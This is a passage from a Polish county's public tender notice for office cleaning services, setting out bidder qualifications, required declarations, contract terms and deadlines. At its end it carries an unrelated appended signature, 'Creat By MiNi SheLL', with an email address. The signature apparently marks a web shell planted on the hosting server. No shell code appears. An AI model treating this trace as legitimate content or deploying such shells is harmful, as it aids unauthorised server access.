sytuacji ekonomicznej lub finansowej: Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>d)	zdolności technicznej lub zawodowej: <br/>Warunkiem udziału w postępowaniu w zakresie zdolności technicznej lub zawodowej jest wykazanie, że Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał lub wykonuje co najmniej jedną usługę polegającą na utrzymaniu czystości i porządku w obiekcie biurowym <br/>o powierzchni użytkowej co najmniej 300,00 m2, w systemie pracy ciągłej, przez okres co najmniej 6 miesięcy kalendarzowych. W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>UWAGA: <br/>1.	W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek udziału w postępowaniu, o którym mowa w pkt 2 lit. d) – musi spełnić co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>2.	Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług wykonywanych wspólnie z innymi wykonawcami, wskazane przez niego usługi muszą dotyczyć usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W celu potwierdzenia braku podstaw do wykluczenia Zamawiający wymaga, aby Wykonawca wraz z ofertą złożył Oświadczenie Wykonawcy składane na podstawie art. 125 ust. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, że nie podlega on wykluczeniu oraz spełnia warunki udziału w postępowaniu Oświadczenie – należy złożyć zgodnie z Załącznikiem nr 3 do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu, w zakresie, w jakim każdy z Wykonawców wskazuje spełnianie warunków udziału w postępowaniu. UWAGA: Oświadczenia składane na podstawie art. 125 należy złożyć wraz z ofertą.<br/>2. Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia podmiotowych środków dowodowych, określonych przez Zamawiającego w Rozdziale XIII SWZ.<br/>3. W celu potwierdzenia spełnienia warunków udziału w postępowaniu, Wykonawca składa:<br/>1) Środki dowodowe potwierdzające spełnianie warunków w postępowaniu: tu nie dotyczy.<br/>2) Środki dowodowe potwierdzające brak podstaw wykluczenia w postępowaniu:<br/>a) Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa z art.125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego w Rozdziale XIII ust. 1 pkt.1 i ust. 2.<br/>Oświadczenie – należy złożyć zgodnie z Załącznikiem nr 9 do SWZ.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie składa każdy z Wykonawców.<br/>b) Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia w oparciu o art. 109 ust. 1 pkt 4 ustawy Pzp;<br/>c) Oświadczenie Wykonawcy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej.<br/>Oświadczenie – należy złożyć zgodnie z Załącznikiem nr 11 do SWZ.<br/>4. Podmiotowe środki dowodowe muszą być aktualne na dzień ich złożenia.<br/>Szczegóły - Rozdział XV SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia podmiotowych środków dowodowych, określonych przez Zamawiającego w Rozdziale XIII SWZ.<br/>W celu potwierdzenia spełnienia warunków udziału w postępowaniu, Wykonawca składa: <br/>1)	Środki dowodowe potwierdzające spełnianie warunków w postępowaniu: <br/>a)	Wykaz usług wykonanych lub wykonywanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonane lub są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku usług nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy przed terminem składania ofert (wg wzoru - Załącznik nr 10 do Zaproszenia). <br/>Opis warunku w Rozdziale XIII, ust. 1 pkt 2 lit. d).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W niniejszym postępowaniu Zamawiający nie wymaga wniesienia przedmiotowych środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta musi składać się z:<br/>1)	formularza oferty – wypełniony formularz ofertowy sporządzony z wykorzystaniem wzoru stanowiącego Załącznik nr 2 do SWZ, zawierający w szczególności: wskazanie oferowanego przedmiotu zamówienia, warunki ofertowe Wykonawcy, oświadczenia;<br/>2)	formularza asortymentowo-cenowego: sporządzony i wypełniony według wzoru stanowiącego Załącznik nr 3 do SWZ,<br/>UWAGA: Część 1 zamówienia - Załącznik nr 3A do SWZ;<br/>Część 2 zamówienia - Załącznik nr 3B do SWZ;<br/>3)	oświadczenia Wykonawcy składanego na podstawie art. 125 ust. 1 ustawy Pzp <br/> - Oświadczenie Wykonawcy winno być sporządzone zgodnie z formularzem stanowiącym Załącznik nr 4 do SWZ;<br/>4)	oświadczenia Podmiotu udostępniającego zasoby składanego na podstawie art. 125 ust. 1 ustawy Pzp – jeśli dotyczy z wykorzystaniem wzoru stanowiącego Załącznik nr 5 do SWZ;<br/>5)	oświadczenia - Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy Pzp – składane w przypadku, gdy Wykonawca w celu wykazania spełnienia warunków udziału w postępowaniu polega na zasobach podmiotu udostępniającego zasoby – jeśli dotyczy z wykorzystaniem wzoru stanowiącego Załącznik nr 6 do SWZ;<br/>6)	oświadczenia składanego na podstawie art. art. 117 ust. 4, w przypadku podmiotów składających ofertę wspólną - jeśli dotyczy z wykorzystaniem wzoru stanowiącego Załącznik nr 7 do SWZ;<br/>7)	wykazania zastrzeżenia informacji stanowiących tajemnicę przedsiębiorstwa zgodnie z zapisami w Rozdziale VII ust. 11 SWZ – jeśli dotyczy;<br/> W sytuacji, gdy oferta lub inne dokumenty składane w toku postępowania będą zawierały tajemnicę przedsiębiorstwa, Wykonawca wraz z przekazaniem takich informacji, zastrzega, że nie mogą być one udostępnione, oraz wykazuje, <br/>że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji. Zaleca się, aby uzasadnienie zastrzeżenia informacji jako tajemnicy przedsiębiorstwa było sformułowane w sposób umożliwiający jego udostępnienie. Zastrzeżenie przez Wykonawcę tajemnicy przedsiębiorstwa bez uzasadnienia, będzie traktowane przez Zamawiającego jako bezskuteczne ze względu na zaniechanie przez Wykonawcę podjęcia niezbędnych działań w celu zachowania poufności objętych klauzulą informacji zgodnie z postanowieniami art. 18 ust. 3 ustawy Pzp. <br/>8)	dowodów dot. „samooczyszczenia” - w przypadku podlegania wykluczeniu na podstawie art. 108 ust. 1 i 109 ust. 1 pkt 4 ustawy Pzp;<br/>9)	dokumentu/-ów, z których wynika prawo do podpisania Oferty;<br/> W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania, Wykonawca składa odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru. Wykonawca nie jest zobowiązany do złożenia ww. dokumentów, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów. Jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z informacji <br/>z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej, Zamawiający żąda od Wykonawcy złożenia Pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy. Zamawiający żąda złożenia ww. dokumentów także od osoby działającej w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców - oświadczenie Wykonawcy, że nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu z wykorzystaniem wzoru stanowiącego Załącznik nr 4 do SWZ - składa każdy z Wykonawców. Oświadczenia te potwierdzają braki podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu, w zakresie, w jakim każdy z Wykonawców wskazuje spełnianie warunków udziału w postępowaniu.<br/>Zamawiający informuje, że dodatkowe, szczegółowe informacje zawarte zostały w rozdziale Rozdziale X: OPIS SPOSOBU PRZYGOTOWANIA OFERTY oraz w Rozdziale XIII: PODSTAWY WYKLUCZENIA I WARUNKI UDZIAŁU W POSTĘPOWANIU. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia zostały opisane w w Załączniku nr 8 do SWZ – Projektowane postanowienia umowy: dla części 1 - Załącznik 8A do SWZ, dla części 2- Załącznik 8B do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-30 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferta powinna być złożona za pośrednictwem Platformy E-zamówienia na formularzu ofertowym dostępnym w systemie. Szczegóły - Rozdział XI SWZ.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-30 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-28</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Dokumenty postępowania będą także dostępne na stronie internetowej - BIP Powiatu Szczycieńskiego:<br/>https://bip.powiatszczycienski.pl/zamowienia_publiczne/137/status/rodzaj/wzp/zwr/<br/>- tu należy wybrać odpowiedni kafelek np.: „Aktualne”, „W toku”.

Creat By MiNi SheLL
Email: jattceo@gmail.com